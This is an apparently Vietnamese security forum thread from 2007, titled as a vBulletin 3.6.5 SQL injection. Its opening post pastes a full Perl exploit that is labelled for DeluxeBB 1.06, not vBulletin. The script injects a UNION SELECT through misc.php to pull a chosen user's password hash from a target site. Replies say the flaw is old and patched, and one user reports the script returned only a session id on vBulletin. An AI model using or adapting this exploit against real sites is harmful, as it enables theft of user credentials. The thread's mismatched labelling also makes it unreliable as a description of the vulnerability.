[Announcement] Vbulletin 3.6.5 Sql Injection ! [misc.php] |
12/05/2007 10:20:10 (+0700) | #1 | 58599 |
hijackvn
Member
|
0 |
|
|
Joined: 11/05/2007 22:58:39
Messages: 2
Offline
|
|
Có bác nào biết cách sử dụng pws hash không ?
Code:
#!/usr/bin/perl
use IO::Socket;
print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# exploit discovered and coded #
# by KingOfSka #
# http://contropotere.netsons.org #
#############################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
exit();
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
|
|
|
|
|
[Question] Vbulletin 3.6.5 Sql Injection ! [misc.php] |
12/05/2007 16:50:06 (+0700) | #2 | 58653 |
|
SonNguyen_sn
Member
|
0 |
|
|
Joined: 16/04/2007 20:10:44
Messages: 53
Offline
|
|
Lỗi này có cách đây > 1 tháng rồi.
Và hầu hết đã FIXX rồi! |
|
|
[Question] Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] |
13/05/2007 11:27:01 (+0700) | #3 | 58819 |
|
mechk
Member
|
0 |
|
|
Joined: 26/01/2007 18:07:00
Messages: 49
Location: đâu
Offline
|
|
Lấy pass hash rồi làm gì đây bác? |
|
sắp ! |
|
[Question] Re: Vbulletin 3.6.5 Sql Injection ! [misc.php] |
15/05/2007 14:38:30 (+0700) | #4 | 59274 |
|
SuperChicken
Elite Member
|
0 |
|
|
Joined: 11/07/2006 18:31:27
Messages: 635
Location: bottom of hell
Offline
|
|
Hix, hôm nọ thử cái script này trên vbb 3.6.5 của mình (mình nhớ là chưa patch gì hết) thì nó cũng hiện hashed password đàng hoàng, hóa ra lại không phải password của mình, search thử giá trị đó trong DB thì rốt cuộc chỉ là 1 cái sessionid vừa được tạo, hìhì, may ghê :lol |
|
|
[Question] Vbulletin 3.6.5 Sql Injection ! [misc.php] |
19/05/2007 07:25:24 (+0700) | #5 | 60160 |
|
nhimthulinh
Member
|
0 |
|
|
Joined: 14/04/2007 16:23:16
Messages: 19
Offline
|
|
Nói vậy nghĩa là ko hiệu wả ah? |
|
|
|